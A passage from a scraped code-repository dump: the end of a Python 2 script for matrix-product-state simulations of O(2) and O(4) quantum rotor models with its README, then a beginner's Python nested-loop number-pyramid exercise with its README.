lbl='$D=140$,\\n $l \\\\le 2$', plot_an=False, fmt='bo',\n fcol='None', ecol='b')\n \n plt.legend(frameon=False, loc=3, numpoints=1,\n handlelength=1, fontsize=7)\n #ax = plt.gca()\n #handles, labels = ax.get_legend_handles_labels()\n #ax.legend(handles[::-1], labels[::-1], frameon=False)\n \n #plt.xlim((1.5, 2.6))\n #plt.ylim((0.013, 0.28))\n plt.xlim((1.4, 0.64 * g2i_fac))\n plt.ylim((0.0075, 0.408))\n plt.ylabel('')\n #plt.gca().get_yaxis().set_ticklabels([])\n plt.gca().get_xaxis().set_ticks([1.4, 1.6, 1.8, 2.0, 2.2, 2.4])\n plt.gca().get_xaxis().set_ticklabels(['1.4', '', '1.8', '', '2.0', '', '2.4'])\n plt.tight_layout()\n \n #plt.savefig(\"gap_log_SU2.pdf\")\n\n if not usualg:\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n else:\n g2i_fac = 1\n E_fac = 1\n \n #plt.figure(figsize=(3.5, 2.5))\n plt.subplot(121)\n plt.title('(a) $O(2)$')\n plot_gap_log(G=1, Ds=[32], max_irs=[6], lowest_en=True, usualg=usualg, \n lbl=\"$D=32$,\\n $|n| \\\\le 6$\", fmt='cD',\n fcol='None', ecol='c')\n plot_gap_log(G=1, Ds=[64], max_irs=[5], lowest_en=True, usualg=usualg, \n lbl=\"$D=64$,\\n $|n| \\\\le 5$\", plot_an=False, fmt='b^',\n fcol='None', ecol='r')\n plot_gap_log(G=1, Ds=[64], max_irs=[6], lowest_en=True, usualg=usualg, \n lbl=\"$D=64$,\\n $|n| \\\\le 6$\", plot_an=False, fmt='bo',\n fcol='None', ecol='b')\n \n plt.legend(frameon=False, loc=3, numpoints=1,\n handlelength=1, fontsize=7)\n \n #plt.xlim((0.57, 0.93))\n #plt.ylim((0.0019, 0.73))\n plt.xlim((0.39 * g2i_fac, 0.65 * g2i_fac))\n plt.ylim((0.003 / sp.sqrt(g2i_fac) * E_fac, 1 / sp.sqrt(g2i_fac) * E_fac))\n plt.gca().get_xaxis().set_ticks([0.55, 0.6, 0.65, 0.7, 0.75, 0.80, 0.85, 0.9])\n plt.gca().get_xaxis().set_ticklabels(['', '0.6', '', '0.7', '', '0.8', '', '0.9'])\n plt.tight_layout()\n plt.subplots_adjust(left=0.14, right=0.99, top=0.92, bottom=0.15, wspace=0.3)\n \n plt.savefig(\"gap_logs.pdf\")\n \ndef pub_plot_beta(usualg=False):\n import matplotlib.pyplot as plt\n \n if usualg:\n g2i_fac = 4\n E_fac = 1\n else:\n g2i_fac = 1\n E_fac = 1. \n \n plt.figure(figsize=(3.5, 2.5))\n plt.subplot(122)\n plt.title('(b) $O(4)$')\n plot_beta(G=2, Ds=[91], max_irs=[4], lowest_en=True, usualg=usualg,\n lbl='$D=91$, \\n $l \\le 2$', plot_an=True, fmt='cD',\n ecol='c', fcol='None') \n plot_beta(G=2, Ds=[140], max_irs=[3], lowest_en=True, usualg=usualg,\n lbl='$D=140$, \\n $l \\le 3/2$', plot_an=False, fmt='r^',\n ecol='r', fcol='None')\n plot_beta(G=2, Ds=[140], max_irs=[4], lowest_en=True, usualg=usualg, \n lbl='$D=140$, \\n $l \\le 2$', plot_an=False, fmt='bo',\n ecol='b', fcol='None')\n \n #plt.legend(frameon=False, loc=2)\n ax = plt.gca()\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles[::-1], labels[::-1], frameon=False, loc=2, numpoints=1,\n handlelength=1, fontsize=7)\n \n #plt.xlim((1.5, 2.6))\n #plt.ylim((0.013, 0.28))\n plt.xlim((0, 0.713))\n plt.ylim((0, 0.275))\n plt.ylabel('')\n plt.gca().get_xaxis().set_ticks([0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7])\n plt.gca().get_xaxis().set_ticklabels(['0.0', '', '0.2', '', '0.4', '', \n '0.6', '']) \n plt.tight_layout()\n \n #plt.savefig(\"beta_SU2.pdf\")\n\n if usualg:\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n else:\n g2i_fac = 1\n E_fac = 1\n \n #plt.figure(figsize=(1.5, 2.5))\n plt.subplot(121)\n plt.title('(a) $O(2)$')\n plot_beta(G=1, Ds=[32], max_irs=[6], lowest_en=True, usualg=usualg,\n lbl='$D=32$, \\n $|n| \\le 6$', plot_an=True, fmt='cD',\n ecol='c', fcol='None')\n plot_beta(G=1, Ds=[64], max_irs=[5], lowest_en=True, usualg=usualg, \n lbl='$D=64$, \\n $|n| \\le 5$', plot_an=False, fmt='r^',\n ecol='r', fcol='None')\n plot_beta(G=1, Ds=[64], max_irs=[6], lowest_en=True, usualg=usualg, \n lbl='$D=64$, \\n $|n| \\le 6$', plot_an=False, fmt='bo',\n ecol='b', fcol='None')\n \n ax = plt.gca()\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(handles[::-1], labels[::-1], frameon=False, loc=2, numpoints=1,\n handlelength=1, fontsize=7)\n \n #plt.xlim((0.57, 0.93))\n #plt.ylim((0.0019, 0.73))\n plt.xlim((1.0, 1.543))\n plt.ylim((0, 0.2))\n plt.tight_layout()\n \n plt.subplots_adjust(left=0.1275, right=0.99, top=0.92, bottom=0.14, wspace=0.25)\n \n plt.savefig(\"betas.pdf\")\n\ndef pub_plot_cc():\n import matplotlib.pyplot as plt\n \n plot_cc(sp.arange(22, 88, 6), G=1, pars=[0.75, 0.8, 0.85, 0.9], \n max_ir=5, offset=0.1) \n plt.figure(2)\n #plt.gca().legend_.remove()\n plt.legend(loc=2, fancybox=True)\n plt.tight_layout()\n \n plt.savefig(\"cc_U1.pdf\")\n \ndef pub_plot_SB_extrap():\n import matplotlib.pyplot as plt\n \n D2 = sp.array([14, 30, 55, 91, 140, 204])\n g2 = sp.array([0.502, 0.522, 0.577, 0.608, 0.653, 0.677])\n \n D1 = sp.array([32, 48, 64, 96, 128])\n g1 = sp.array([0.607, 0.613, 0.619, 0.623, 0.626])\n \n p, cov = sp.polyfit(1./D1, 1./g1, deg=1, cov=True)\n xs = sp.linspace(0, 0.05, num=2)\n \n plt.figure(figsize=[2.5, 2.])\n \n g2i_fac = 1#sp.sqrt(2)\n plt.plot(1./D1, 1./g1 / g2i_fac, '^', label='$U(1) \\\\sim O(2)$', markersize=3.5, markeredgewidth=0.5,\n markeredgecolor='b', markerfacecolor='None')\n \n g2i_fac = 1#4\n plt.plot(1./D2, 1./g2 / g2i_fac, 'D', label='$SU(2) \\\\sim O(4)$', markersize=3.5, markeredgewidth=0.5,\n markeredgecolor='r', markerfacecolor='None')\n \n g2i_fac = 1# sp.sqrt(2) \n plt.plot(xs, sp.polyval(p, xs) / g2i_fac, 'k-', \n label='$\\\\tilde g_{\\mathrm{BKT}} \\\\approx %.3f \\\\pm %.3f$' % (p[1] / sp.sqrt(2),\n sp.sqrt(cov[1,1])/sp.sqrt(2)))\n #plt.gca().legend_.remove()\n l = plt.legend(loc=4, frameon=True, fancybox=True)\n l.get_frame().set_linewidth(0.4)\n plt.xlabel(\"$1/D$\")\n #plt.ylabel(\"$\\\\tilde g_{\\mathrm{SB}}$\")\n plt.ylabel(\"$g^2_{\\mathrm{SB}}$\")\n plt.tight_layout()\n plt.subplots_adjust(left=0.125, right=0.96, top=0.96, bottom=0.17)\n \n plt.savefig(\"SB_extrap.pdf\")\n\ndef plot_pd():\n import matplotlib.pyplot as plt\n #import matplotlib.patches as mpatches\n \n plt.rcParams['text.usetex'] = True\n plt.rcParams['ps.usedistiller'] = 'xpdf'\n plt.rcParams['font.size'] = 7\n plt.rcParams['font.family'] = 'serif'\n plt.rcParams['font.serif'] = 'Computer Modern Roman'\n \n plt.rcParams['figure.subplot.bottom'] = 0.\n plt.rcParams['figure.subplot.left'] = 0.\n plt.rcParams['figure.subplot.top'] = 1.\n plt.rcParams['figure.subplot.right'] = 1.\n \n left = -10\n right = 10\n \n t1 = 0.3\n t2 = 5\n \n ratio = 0.3\n \n paper_width = 3.4\n \n plt.figure(figsize=(paper_width, paper_width * ratio), frameon=False)\n plt.plot([left, right], [1, 1], '-', color='0.5', linewidth=1)\n plt.plot([left, t1], [1, 1], 'b--', linewidth=1)\n plt.plot([t1, t2], [1, 1], 'r--', linewidth=1)\n plt.plot([t2, right], [1, 1], 'k--', linewidth=1)\n plt.plot([left - 2, left], [1, 1], ':', color='0.5', linewidth=1)\n plt.plot([right, right + 2], [1, 1], ':', color='0.5', linewidth=1)\n \n plt.plot([0, 0], [0.5, 1.5], 'k', linewidth=0.5)\n \n plt.plot([t1, t1], [-0.5, 2.5], 'k', linewidth=1)\n plt.plot([t2, t2], [-0.5, 2.5], 'k', linewidth=1)\n \n plt.text(t1, 2.8, \"second\\n order\", horizontalalignment=\"center\")\n plt.text(t1, -1.3, \"$\\\\sim %g$\" % t1, horizontalalignment=\"center\")\n plt.text(t2, 2.8, \"BKT\", horizontalalignment=\"center\")\n plt.text(t2, -1.3, \"$\\\\sim %g$\" % t2, horizontalalignment=\"center\")\n \n plt.text(left - 2, -1.3, \"$\\\\kappa:$\", horizontalalignment=\"left\")\n \n plt.text(left, -1.3, \"$%g$\" % left, horizontalalignment=\"center\")\n plt.text(right, -1.3, \"$%g$\" % right, horizontalalignment=\"center\")\n \n plt.text(left + (t1 - left)/2, 1.5, \"Ising\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(left + (t1 - left)/2, 0.5, \"$c=0.5$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t1 + (t2 - t1)/2, 1.5, \"floating\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t1 + (t2 - t1)/2, 0.5, \"$c=1.5$\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t2 + (right - t2)/2, 1.5, \"antiphase\", horizontalalignment=\"center\", verticalalignment=\"center\")\n plt.text(t2 + (right - t2)/2, 0.5, \"gapped\", horizontalalignment=\"center\", verticalalignment=\"center\")\n \n ax = plt.gca()\n #p = mpatches.Circle((1.1, 1), 0.2, fc=\"w\")\n #ax.add_patch(p)\n #ax.annotate(\"$c=1.5$\", (1.1, 1), (1.1, -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"$c=0.5$\", (-10., 1), (-10., -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"$c=0.5$\", (-2., 1), (-2., -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"$c=0.5$\", (-1., 1), (-1., -1), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n #ax.annotate(\"no CFT\", (10, 1), (10, -2.5), ha=\"center\", arrowprops=dict(arrowstyle='->',))\n \n height = (right - left + 4) * ratio\n plt.ylim(1 - height / 2, 1 + height / 2)\n plt.xlim(left - 2, right + 2)\n \n ax.set_axis_off()\n# ax.get_yaxis().set_visible(False)\n# ax.spines['left'].set_visible(False)\n# ax.spines['right'].set_visible(False)\n# ax.spines['top'].set_visible(False)\n# ax.spines['bottom'].set_visible(False)\n #plt.tight_layout()\n plt.show()\n\ndef get_ground(s, D_targ, ops, step_init=0.04, tol=1E-8, expand_tol=None, D_step=2, \n use_CG=True, par_str='', CG_start_tol=1E-1):\n print \"Bond dimension: \" + str(s.D)\n print\n col_heads = [\"par\", \"Step\", \"<h>\", \"d<h>\", \"corrlen\"] + [\"Sz\"] * s.L + [\"eta\"]\n print \"\\t\".join(col_heads)\n print\n \n U, P, P2, ReUUH, ReUUH_tp = ops\n\n \"\"\"\n Create a function to print out info during the solver iterations.\n \"\"\"\n h_prev = [0]\n def cbf(s, i, **kwargs):\n h = s.h_expect.real\n\n row = []\n \n row.append(par_str)\n \n row.append(str(i))\n\n row.append(\"%.15g\" % h)\n\n dh = h - h_prev[0]\n h_prev[0] = h\n\n row.append(\"%.2e\" % (dh))\n \n if i % 10 == 0:\n cl = s.correlation_length().real\n else:\n cl = sp.nan\n row.append(\"%.2e\" % (cl))\n\n \"\"\"\n Compute expectation values!\n \"\"\"\n exUs = []\n for k in xrange(s.L):\n exUs.append(\"%.3g\" % s.expect_1s(U[0][0], k=k).real)\n row += exUs\n \n exP2s = []\n for k in xrange(s.L):\n exP2s.append(\"%.3g\" % s.expect_1s(P2, k=k).real)\n row += exP2s\n \n row += map(lambda k: \"%.6g\" % s.entropy(k).real, range(s.L))\n \n row.append(\"%.6g\" % s.eta.real)\n\n row.append(str(kwargs))\n\n print \"\\t\".join(row)\n\n\n if use_CG:\n dy.find_ground(s, tol=tol, h_init=step_init, expand_to_D=D_targ, \n expand_step=D_step, expand_tol=expand_tol, cb_func=cbf,\n CG_start_tol=CG_start_tol)\n else:\n dy.opt_im_time(s, tol=tol, dtau_base=step_init, expand_to_D=D_targ,\n cb_func=cbf, auto_trunc=True)\n \n if s.eta.real < tol:\n s.update()\n return s\n \n\ndef calc_excite(s, num_mom=20, num_exc=20, v0=None):\n \"\"\"\n Find excitations if we have the ground state.\n \"\"\"\n print 'Finding excitations!'\n\n ex_ev = []\n ex_p = []\n for p in sp.linspace(0, sp.pi, num=num_mom):\n print \"p = \", p\n ev, eV = s.excite_top_triv(p, k=num_exc, ncv=num_exc * 4,\n return_eigenvectors=True, v0=v0)\n print ev\n \n #Use previous momentum lowest eigenvector as a starting point\n ind = ev.argmin()\n v0 = eV[:, ind]\n \n ex_ev.append(ev) \n ex_p.append([p] * num_exc)\n \n ex_ev = sp.array(ex_ev).ravel()\n ex_p = sp.array(ex_p).ravel()\n return sp.column_stack((ex_p, ex_ev)), v0\n \ndef get_grid_1d(a, b, step=0.0001, dp=4):\n a = sp.around(a * 10**dp)\n b = sp.around(b * 10**dp)\n step = sp.around(step * 10**dp)\n \n return sp.arange(a, b + step, step, dtype=int) / 10.0**dp\n \ndef load_state(G, g2inv, D, L, max_ir, loc='state_data/', par_tol=1E-8, \n from_file=None, ops=None, ret_res_row=False):\n if from_file is None:\n ress = sp.genfromtxt(RES_LOAD_FROM, delimiter=\"\\t\",\n dtype=None)\n intref = sp.array([G, D, L, max_ir], dtype=int)\n fns = []\n ens = []\n resrs = []\n for res in ress:\n ints = sp.array([res[cols[s]] for s in ['G', 'D', 'L', 'max_ir']], dtype=int)\n if (sp.all(ints == intref) and \n sp.allclose(res[cols['g2inv']], g2inv, atol=par_tol)):\n fns.append(res[cols['fn']])\n ens.append(res[cols['energy']])\n resrs.append(res)\n else:\n fns = [from_file]\n ens = [0]\n resrs = [None]\n \n print ens\n print fns\n if len(fns) > 0:\n ens = sp.array(ens)\n ind = ens.argmin()\n fn = fns[ind]\n print \"Choosing lower energy, delta =\", ens.max() - ens[ind]\n resr = resrs[ind]\n \n if ops is None:\n ops = get_ops(G, max_ir)\n s = create_tdvp(D, get_ham(g2inv, ops), L=L, ham_tp=get_ham_tp(g2inv, ops))\n s.load_state(loc + fn)\n if ret_res_row:\n if resr is None:\n resr = get_res_row(s, G, g2inv, max_ir, ops=ops)\n return s, resr\n else:\n return s\n else:\n print \"No state found!\", g2inv, D, L\n if ret_res_row:\n return None, None\n else:\n return None\n\ndef calc_wv_gap(s_in, v0=None, blocking_D_limit=24, calc_gap=True, nev=20): \n evs = s_in._calc_E_largest_eigenvalues(k=4, ncv=None)\n if len(evs) > 1:\n ind = abs(evs).argmax()\n mask = sp.ones((len(evs)), dtype=bool)\n mask[ind] = False\n ind_wv = abs(evs[mask]).argmax()\n wv = sp.angle(evs[mask][ind_wv])\n else:\n wv = 0.\n \n if calc_gap:\n if s_in.L > 1 and s_in.D <= blocking_D_limit:\n s = copy.deepcopy(s_in)\n s.convert_to_TI_blocked()\n else:\n s = s_in\n\n try:\n evs, eVs = s.excite_top_triv(wv, nev=4, v0=v0, return_eigenvectors=True, tol=1E-11, pinv_tol=1E-12)\n ind = evs.argmin()\n v0 = eVs[:, ind]\n gap = evs[ind]\n except tdvp.EvoMPSNoConvergence:\n gap = sp.NaN\n else:\n gap = sp.NaN\n \n return wv, gap, v0\n \ndef scan(g2inv1, g2inv2, G=1, step=0.01, D=16, D_init=8, D_step=2, L=1, max_ir=5,\n tol=1E-8, expand_tol=None, CG_start_tol=1E-1, h_init=0.04,\n load_first=True, load_tol=1E-8, start_state=None, calc_gap=True):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n ops = get_ops(G, max_ir)\n \n if not start_state is None:\n s = start_state\n elif load_first:\n s = load_state(G, pars[0], D, L, max_ir, par_tol=load_tol, ops=ops)\n if not s is None:\n if load_tol <= 1E-8:\n pars = pars[1:]\n else:\n s = load_state(G, pars[0], D_init, L, max_ir, par_tol=load_tol, ops=ops)\n print \"Trying to load at D_init for\", pars[0]\n \n if s is None:\n print \"State not found for\", pars[0]\n return\n else:\n s = None\n \n v0 = None\n for par in pars:\n if s is None:\n s = create_tdvp(D_init, get_ham(par, ops), L=L, ham_tp=get_ham_tp(par, ops))\n else:\n s.set_ham(get_ham(par, ops))\n s.ham_tp = get_ham_tp(par, ops)\n \n s = get_ground(s, D, ops, tol=tol, par_str=str([par, D, L]), \n D_step=D_step, expand_tol=expand_tol, \n CG_start_tol=CG_start_tol, step_init=h_init)\n if not s is None:\n wv, gap, v0 = calc_wv_gap(s, v0=v0, calc_gap=calc_gap)\n resrow = save_result(s, G, par, max_ir, wv=wv, gap_wv=gap, v0=v0, ops=ops)\n else:\n resrow = None\n print \"Failed to get ground for\", par\n \n return s, resrow\n \ndef fg_one(g2inv, D, G=1, L=1, max_ir=5, tol=1E-8, load_tol=1E-1, calc_gap=True):\n scan(g2inv, g2inv, G=G, D=D, D_init=D, L=L, max_ir=max_ir, tol=tol, load_first=True,\n load_tol=load_tol, calc_gap=calc_gap)\n\ndef fine_grain(g2inv1, g2inv2, G=1, step=0.01, D=16, L=1, max_ir=5, tol=1E-8, \n mprocs=1, load_tol=1E-1, calc_gap=True):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n if mprocs > 1:\n from multiprocessing import Pool\n p = Pool(mprocs)\n resobjs = [p.apply_async(fg_one, args=(par, D), \n kwds={'L': L,\n 'max_ir': max_ir,\n 'tol': tol,\n 'load_tol': load_tol,\n 'calc_gap': calc_gap,\n 'G': G})\n for par in pars]\n for ro in resobjs:\n ro.get()\n else:\n for par in pars:\n fg_one(par, D, G=G, L=L, max_ir=max_ir, tol=tol, load_tol=load_tol,\n calc_gap=calc_gap)\n \ndef expand_one(g2inv, D_init, D, D_step, G=1, L=1, max_ir=5, tol=1E-8, calc_gap=True, \n load_from=None, D_step_intern=2, expand_tol=None,\n until_conv_in=None, conv_tol=1E-4, try_to_load_allD=False):\n D_targ = D_init\n s, resr = load_state(G, g2inv, D_init, L, max_ir, from_file=load_from,\n ret_res_row=True)\n \n conv_vals = []\n sL = None\n while D_targ < D:\n D_prev = D_targ\n D_targ += D_step\n if not until_conv_in is None:\n conv_vals.append(resr[cols[until_conv_in]])\n if len(conv_vals) > 1:\n diff = abs((conv_vals[-1] - conv_vals[-2]) / conv_vals[-1])\n print \"Convergence check (\" + until_conv_in + \"):\", conv_vals, diff\n if diff < conv_tol:\n print \"Converged!\"\n break\n if try_to_load_allD:\n sL, resrL = load_state(G, g2inv, D_targ, L, max_ir, ret_res_row=True)\n if sL is None:\n s, resr = scan(g2inv, g2inv, G=G, D=D_targ, D_init=D_prev, L=L, \n max_ir=max_ir, tol=tol, \n load_first=False, start_state=s, calc_gap=calc_gap,\n D_step=D_step_intern, expand_tol=expand_tol)\n else:\n s = sL\n resr = resrL\n\ndef expand_existing(g2inv1, g2inv2, G=1, step=0.01, D=16, D_init=8, D_step=2, L=1, \n max_ir=5, until_conv_in=None, conv_tol=1E-4,\n tol=1E-8, mprocs=1, calc_gap=True, D_step_intern=2,\n expand_tol=None, try_to_load_allD=False):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n if mprocs > 1:\n from multiprocessing import Pool\n p = Pool(mprocs)\n resobjs = [p.apply_async(expand_one, args=(par, D_init, D, D_step), \n kwds={'G': G,\n 'L': L,\n 'max_ir': max_ir,\n 'tol': tol,\n 'calc_gap': calc_gap,\n 'D_step_intern': D_step_intern,\n 'expand_tol': expand_tol,\n 'until_conv_in': until_conv_in,\n 'conv_tol': conv_tol,\n 'try_to_load_allD': try_to_load_allD})\n for par in pars]\n for ro in resobjs:\n ro.get()\n else:\n for par in pars:\n expand_one(par, D_init, D, D_step, G=G, L=L, max_ir=max_ir, tol=tol, \n calc_gap=calc_gap, D_step_intern=D_step_intern,\n expand_tol=expand_tol, until_conv_in=until_conv_in,\n conv_tol=conv_tol, try_to_load_allD=try_to_load_allD)\n\n#def gap_existing_one(g2inv, D, G=1, L=1, max_ir=5, tol=1E-8, calc_gap=True, \n# load_from=None, excite_tol=0, pinv_tol=1E-12):\n# s, resr = load_state(G, g2inv, D, L, max_ir, from_file=load_from,\n# ret_res_row=True)\n# \n# \n# \n#def gap_existing(g2inv1, g2inv2, G=1, step=0.01, D=16, D_init=8, D_step=2, L=1, \n# max_ir=5, until_conv_in=None, conv_tol=1E-4,\n# tol=1E-8, mprocs=1, calc_gap=True, D_step_intern=2,\n# expand_tol=None, try_to_load_allD=False):\n# pars = get_grid_1d(g2inv1, g2inv2, step)\n# \n# if mprocs > 1:\n# from multiprocessing import Pool\n# p = Pool(mprocs)\n# resobjs = [p.apply_async(gap_existing_one, args=(par, D_init, D, D_step), \n# kwds={'G': G,\n# 'L': L,\n# 'max_ir': max_ir,\n# 'tol': tol,\n# 'calc_gap': calc_gap,\n# 'D_step_intern': D_step_intern,\n# 'expand_tol': expand_tol,\n# 'until_conv_in': until_conv_in,\n# 'conv_tol': conv_tol,\n# 'try_to_load_allD': try_to_load_allD})\n# for par in pars]\n# for ro in resobjs:\n# ro.get()\n# else:\n# for par in pars:\n# gap_existing_one(par, D_init, D, D_step, G=G, L=L, max_ir=max_ir, tol=tol, \n# calc_gap=calc_gap, D_step_intern=D_step_intern,\n# expand_tol=expand_tol, until_conv_in=until_conv_in,\n# conv_tol=conv_tol, try_to_load_allD=try_to_load_allD)\n \ndef reprocess_existing(new_res_file, recalc_gap=False):\n oldcols = {'G': 0,\n 'g2inv': 1, \n 'D': 2, \n 'L': 3,\n 'max_ir': 4,\n 'eta': 5, \n 'energy': 6, \n 'cl': 7, \n 'entr_max': 8, \n 'U_av': 9, \n 'U_0': 10,\n 'U2_0': 11,\n 'P_av': 12,\n 'P_0': 13,\n 'P2_0': 14,\n 'ReUUH_av': 15,\n 'ReUUH_0': 16,\n 'ReUUH2_0': 17,\n 'wv_dom': 18, \n 'wv_fit': 19, \n 'gap': 20, \n 'exc_fn': 21,\n 'fn': 22} \n \n ress = sp.genfromtxt(RES_LOAD_FROM, delimiter=\"\\t\", dtype=None)\n \n for res in ress:\n print \"processing:\", res\n G = res[oldcols['G']]\n g2inv = res[oldcols['g2inv']]\n D = res[oldcols['D']]\n L = res[oldcols['L']]\n max_ir = res[oldcols['max_ir']]\n fn = res[oldcols['fn']]\n \n wv = res[oldcols['wv_dom']]\n gap = res[oldcols['gap']]\n \n ops = get_ops(G, max_ir)\n s = create_tdvp(D, get_ham(g2inv, ops), L=L, ham_tp=get_ham_tp(g2inv, ops))\n s.load_state('state_data/' + fn)\n s.update()\n s.calc_B()\n if recalc_gap:# or sp.isnan(gap):\n wv, gap, v0 = calc_wv_gap(s)\n\n save_result(s, G, g2inv, max_ir, wv=wv, gap_wv=gap, existing_fn=fn, \n res_file=new_res_file, ops=ops)\n \ndef calc_gap_existing(new_res_file, g2inv1, g2inv2, G=1, step=0.01, D=16, \n L=1, max_ir=5, recalc=False, max_U00=1000):\n pars = get_grid_1d(g2inv1, g2inv2, step)\n \n ops = get_ops(G, max_ir) \n \n ress = sp.genfromtxt(RES_LOAD_FROM, delimiter=\"\\t\", dtype=None)\n\n resf = open(new_res_file, 'a')\n fcntl.flock(resf, fcntl.LOCK_EX)\n \n v0 = None\n \n for res in ress:\n if (G == res[cols['G']]\n and D == res[cols['D']]\n and L == res[cols['L']]\n and max_ir == res[cols['max_ir']]\n and abs(res[cols['U_0']]) < max_U00\n and sp.any(abs(pars - res[cols['g2inv']]) < 1E-8)\n and (recalc or sp.isnan(res[cols['gap']]))):\n print \"processing:\", res\n g2inv = res[cols['g2inv']]\n fn = res[cols['fn']]\n s = create_tdvp(D, get_ham(g2inv, ops), L=L, ham_tp=get_ham_tp(g2inv, ops))\n s.load_state('state_data/' + fn)\n s.update()\n s.calc_B()\n wv, gap, v0 = calc_wv_gap(s, v0=v0)\n print \"Gap:\", gap, \"previously\", res[cols['gap']]\n res[cols['wv_dom']] = wv\n res[cols['gap']] = gap\n resf.flush()\n \n resf.write(\"\\t\".join(map(str, res)) + \"\\n\")\n \n resf.close()\n #sp.savetxt(new_res_file, ress)\n #save_result(s, G, g2inv, max_ir, wv=wv, gap_wv=gap, existing_fn=fn, \n # res_file=new_res_file, ops=ops)\n \ndef move_data():\n ress = sp.genfromtxt('petal_res.txt', delimiter=\"\\t\", usecols=(-1), dtype=None)\n for res in ress:\n shutil.move(res, 'state_data/' + res)\n"
},
{
"alpha_fraction": 0.7637655138969421,
"alphanum_fraction": 0.7868561148643494,
"avg_line_length": 79.42857360839844,
"blob_id": "113dde05b26a266abd7b8c2772e3fd3709b49104",
"content_id": "9767ea5c89dcf2a3feeb235cf359b07f86a73432",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 563,
"license_type": "permissive",
"max_line_length": 312,
"num_lines": 7,
"path": "/README.md",
"repo_name": "amilsted/mps-rotors",
"src_encoding": "UTF-8",
"text": "# mps-rotors\nPython code for simulating the O(2) and O(4) rotor models using evoMPS (http://amilsted.github.io/evoMPS/).\nIt currently depends on the development branch of evoMPS.\nThis code was used in: http://arxiv.org/abs/1507.06624\n\n## Description\nThis is a library of functions for computing uniform matrix product state (MPS) ground states for the O(2) and O(4) quantum rotor models and processing and visualizing the results. It is also possible to compute low-lying excited states using the uniform MPS tangent space, including computation of the mass gap.\n"
}
] | 2 |
yuma3496/Capstone_Project_2
|
https://github.com/yuma3496/Capstone_Project_2
|
d44ae629cfdcf48b1e0978edbd28f57a9c77dc30
|
de70f21ba8f02f0bc190fef71e2ee629920378fd
|
458e853e5ee68f02411e3a1337edf105f644e970
|
refs/heads/main
| 2023-03-16T22:03:40.476639 | 2021-03-09T06:24:17 | 2021-03-09T06:24:17 | 345,892,961 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3206590712070465,
"alphanum_fraction": 0.4233206510543823,
"avg_line_length": 34.90909194946289,
"blob_id": "97643fbdf7d8f4e1f5111ef56acb0fa1f9128142",
"content_id": "c8ceb689753ae5a5df1e113b58afa69d7582237d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 789,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 22,
"path": "/TriTable.py",
"repo_name": "yuma3496/Capstone_Project_2",
"src_encoding": "UTF-8",
"text": "# ================= Compulsory Task =================\n# Write a program that uses nested for loops to create the following number pyramid.\n# 1\n# 2 4 \n# 3 6 9\n# 4 8 12 16\n# 5 10 15 20 25\n# 6 12 18 24 30 36\n# 7 14 21 28 35 42 49\n# 8 16 24 32 40 48 56 64\n# 9 18 27 36 45 54 63 72 81\n# ================= Compulsory Task =================\n\n# Ask user input for the number of rows\nmax_range = int(input(\"Enter the number of lines you want to create: \"))\n\n# Create nested loops and print it out\nfor i in range(1, max_range + 1):\n x = \" \"\n for j in range(1, i + 1):\n x = x + str(i * j) + \" \"\n print(x)"
},
{
"alpha_fraction": 0.7786217927932739,
"alphanum_fraction": 0.7851329445838928,
"avg_line_length": 75.79166412353516,
"blob_id": "107a6b0631631c678998d00bd6e8590108f69634",
"content_id": "70b1b714ec1e4644581ccc40045d238094682ff1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1843,
"license_type": "no_license",
"max_line_length": 377,
"num_lines": 24,
"path": "/README.md",
"repo_name": "yuma3496/Capstone_Project_2",
"src_encoding": "UTF-8",
"text": "# A Simple Pyramid Game\n\n## Description:\nThis simple pyramid game is written in Python.\n\n## Functionality\nWhen run, this program prompts input for number of lines you want to create. After inputting the number and hitting Enter, it displays the pyramid with numbers. The screenshot below is an example when inputting '15'. \n\n## Screenshot\n\n\n## How can I use it?\n1. You need to close this repository to your local repository on your computer, so that you can access and run the program. Below is the details of the GitHub help page:\n - https://help.github.com/en/github/creating-cloning-and-archiving-repositories/cloning-a-repository\n \n2. To run this program, download the Python interpreter program onto your computer's operating system so this program can be excuted. Navigate the following website to download Python on your OS:\n - https://www.python.org/downloads/\n \n3. When opened, the IDLE python file will display a Python 'shell' window. From this window, you can now click on 'file' and then 'open' from the toolbar at the top of the window, to navigate to the Finance Calculator program and open it. Once opened, you will be able to view the program code in another file window that will automatically open separately to the Python shell.\n\n4. When you are ready to run it, you can select 'run' from the top toolbar and then interact with the output displayed in the Python shell window. That is where you will be prompted to enter information from your keyboard to choose a calculator and then input the necessary details for calculation.\n\n## Contributions\nThis was developped individually by myself in the software engineering bootcamp. However, it has been reviewed and commented on by the helpful mentors at Hyperion Development.\n"
}
] | 2 |
escaped/cookiecutter-pypackage
|
https://github.com/escaped/cookiecutter-pypackage
|
809406c5d9f786530bb36e0d9758d2461094f2df
|
201e2aa005db39b8b3ab854658dc5d8da0822e3a
|
3d1f8da65ce9780cf6c6d51749c5087f443a87d3
|
refs/heads/master
| 2021-06-25T15:31:26.610820 | 2021-02-11T02:00:01 | 2021-02-11T02:00:08 | 200,654,277 | 10 | 4 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 36,
